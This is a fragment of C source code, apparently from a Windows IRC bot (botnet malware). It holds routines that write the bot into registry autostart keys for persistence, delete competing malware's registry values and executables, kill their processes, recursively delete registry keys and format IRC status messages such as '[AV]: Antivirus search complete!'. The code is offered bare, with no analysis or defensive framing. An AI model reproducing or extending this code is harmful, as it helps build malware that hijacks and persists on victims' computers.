void removevirus() { char sysdir[MAX_PATH], virusexecuteble[MAX_PATH]; unsigned char szDataBuf[128]; HKEY hkey; LONG lRet; DWORD dwSize = 128; for (unsigned int i=0; viruses[i].subkey; i++) { lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) { fRegDeleteValue(hkey, viruses[i].value); //FIXME: Replace the afw kill utils. we dont need to let that loop, // when we removed the .exe and the reg key. mayb a static call // to KillProcess(); can be inserted here. Something like: // KillProcess(viruses[i].file); GetSystemDirectory(sysdir, sizeof(sysdir)); sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file); DeleteFile(virusexecuteble); } fRegCloseKey(hkey); } return; }
void AutoStartRegs(char *nfilename) { HKEY key; for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) { fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); if (nfilename) fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename)); else fRegDeleteValue(key, valuename); fRegCloseKey(key); } return; }
BOOL RegDelete(HKEY root,LPCTSTR subkey,LPCTSTR name) { HKEY key=NULL; if (!subkey) return FALSE; if (!name) { if (fRegDeleteKey(root,subkey) == ERROR_SUCCESS) return TRUE; DWORD inx = 0; DWORD chr = 256; char buf[256] = {0}; FILETIME ftm; if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS) { DWORD cnt = fRegEnumKeyEx(key,inx,buf,&chr,NULL,NULL,NULL,&ftm); while ((cnt != ERROR_NO_MORE_ITEMS) && (cnt == ERROR_SUCCESS)) { RegDelete(root,subkey,buf); cnt = fRegEnumKeyEx(key,(inx++),buf,&chr,NULL,NULL,NULL,&ftm); } fRegDeleteKey(key,subkey); } } else { if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS) { if (fRegDeleteValue(key,name) == ERROR_SUCCESS) { fRegCloseKey(key); return TRUE; } fRegCloseKey(key); } } return FALSE; }
void removevirus() { char sysdir[MAX_PATH], virusexecuteble[MAX_PATH]; unsigned char szDataBuf[128]; SOCKET sock; HKEY hkey; char sendbuf[IRCLINE]; char current[20]; LONG lRet; sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP); DWORD dwSize = 128; for (unsigned int i=0; viruses[i].subkey; i++) { lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) { fRegDeleteValue(hkey, viruses[i].value); strcpy(current,viruses[i].file); //FIXME: Replace the afw kill utils. we dont need to let that loop, // when we removed the .exe and the reg key. mayb a static call // to KillProcess(); can be inserted here. Something like: if(listProcesses(sock,NULL,FALSE,current) == 1) sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file); else sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file); //KillProcess(viruses[i].file); GetSystemDirectory(sysdir, sizeof(sysdir)); sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file); DeleteFile(virusexecuteble); } fRegCloseKey(hkey); } sprintf(sendbuf,"[AV]: Antivirus search complete! "); return; }